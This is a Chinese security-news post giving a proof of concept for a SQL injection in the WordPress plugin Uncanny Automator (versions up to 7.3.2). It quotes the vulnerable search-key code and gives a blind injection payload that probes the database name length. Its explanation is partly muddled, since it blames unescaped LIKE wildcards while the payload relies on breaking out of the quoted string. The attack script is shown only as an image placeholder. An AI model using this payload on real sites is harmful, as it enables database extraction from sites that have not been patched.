微慑信息网

wordpress插件Uncanny Automator CVE-2026-65462 PoC

Uncanny Automator <=7.3.2 

该漏洞源于src/
global-functions.php约352-358行,sanitize_text_field()
只移除 HTML 标签和转义 HTML 实体,不会转义 SQL 通配符 (%, _),导致 LIKE 注入

src/core/admin/admin-logs/wp-list-table/
class-logs-list-table.php

if ( automator_filter_has_var( 'search_key' ) && '' !== automator_filter_input( 'search_key' ) ) {    $search_key = sanitize_text_field( automator_filter_input( 'search_key' ) );    if ( $view_exists ) {        $search_conditions .= " AND ( (recipe_title LIKE '%$search_key%') OR ... ) ";    } else {        $search_conditions .= " AND ( (
            p.post_title
           LIKE '%$search_key%') OR ... ) ";    }}

程序位置 :

图片

PoC:

') and (length(database())=**) and(1 like '1

 

脚本:

图片

赞(0) 打赏
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » wordpress插件Uncanny Automator CVE-2026-65462 PoC

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

觉得文章有用就打赏一下文章作者

非常感谢你的打赏,我们将继续提供更多优质内容,让我们一起创建更加美好的网络世界!

支付宝扫一扫

微信扫一扫

登录

找回密码

注册